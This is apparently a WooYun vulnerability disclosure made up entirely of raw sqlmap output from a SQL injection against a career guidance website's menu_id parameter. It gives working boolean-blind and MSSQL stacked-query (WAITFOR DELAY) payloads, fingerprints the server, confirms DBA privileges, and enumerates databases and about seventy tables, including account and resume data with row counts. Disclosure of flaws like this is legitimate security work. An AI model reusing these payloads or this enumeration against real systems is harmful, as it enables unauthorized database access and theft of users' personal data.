WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: menu_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: menu_id=5 AND 3436=3436&submenu_id=413&apmenu_id=1598
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: menu_id=5;WAITFOR DELAY '0:0:5'--&submenu_id=413&apmenu_id=1598
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database:    'CareerGuide_Shu'
current user is DBA:    True
available databases [5]:
[*] CareerGuide_Shu
[*] master
[*] model
[*] msdb
[*] tempdb

Database: CareerGuide_Shu
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.FunctionRecords     | 308682  |
| dbo.VisitorRecords      | 14623   |
| dbo.Class_sign          | 8204    |
| dbo.Code                | 4039    |
| dbo.Code_201201         | 3999    |
| dbo.LearnMap            | 1789    |
| dbo.papers              | 1682    |
| dbo.Account             | 1585    |
| dbo.appear_papers       | 1493    |
| dbo.Job_Jobtype_TOT     | 1337    |
| dbo.Job_Main_TOT        | 1019    |
| dbo.Res_Comp_TOT        | 992     |
| dbo.Res_Epaper          | 944     |
| dbo.Job_Desc_TOT        | 925     |
| dbo.Consultant_Calendar | 879     |
| dbo.Cmp_Main            | 817     |
| dbo.JobNeeded           | 800     |
| dbo.Res_Main_TOT        | 768     |
| dbo.Res_Status_TOT      | 764     |
| dbo.Job_Lan_TOT         | 588     |
| dbo.rule_acl            | 546     |
| dbo.Job_Major_TOT       | 493     |
| dbo.Res_Jobtype_TOT     | 474     |
| dbo.Res_Indtype_TOT     | 454     |
| dbo.Consultant_Booking  | 360     |
| dbo.Res_Area_TOT        | 342     |
| dbo.Cmp_Profile         | 240     |
| dbo.DataCheck           | 240     |
| dbo.Class               | 207     |
| dbo.MyBook              | 206     |
| dbo.Res_Exp_TOT         | 156     |
| dbo.Res_Lan_TOT         | 147     |
| dbo.Res_Profile_TOT     | 142     |
| dbo.admin_tools         | 129     |
| dbo.Res_Workexp_TOT     | 116     |
| dbo.Res_cerT_TOT        | 92      |
| dbo.Cmp_Image           | 89      |
| dbo.Cmp_Sort            | 89      |
| dbo.Res_edU_TOT         | 80      |
| dbo.extra_function      | 78      |
| dbo.Cmp_News            | 74      |
| dbo.ForumMain           | 58      |
| dbo.Res_Course_TOT      | 53      |
| dbo.system_profile_ext  | 52      |
| dbo.Share               | 49      |
| dbo.Epaper_MailList     | 43      |
| dbo.label               | 43      |
| dbo.EpaperList          | 42      |
| dbo.Cmp_Gmessage        | 29      |
| dbo.Res_Reward_TOT      | 29      |
| dbo.Res_Association_TOT | 27      |
| dbo.Res_Parttime_TOT    | 27      |
| dbo.Consultant_Teacher  | 22      |
| dbo.Res_Service_TOT     | 19      |
| dbo.mail_open           | 18      |
| dbo.Res_Jobplan_TOT     | 18      |
| dbo.Res_ExtrActive_TOT  | 15      |
| dbo.function_class      | 10      |
| dbo.Res_Hidden_TOT      | 9       |
| dbo.label_class         | 7       |
| dbo.rule_user           | 7       |
| dbo.rule_group          | 6       |
| dbo.user_basic          | 6       |
| dbo.HotMessage          | 5       |
| dbo.epaper_type         | 3       |
| dbo.Res_Check_TOT       | 2       |
| dbo.FAQ                 | 1       |
| dbo.system_profile      | 1       |
+-------------------------+---------+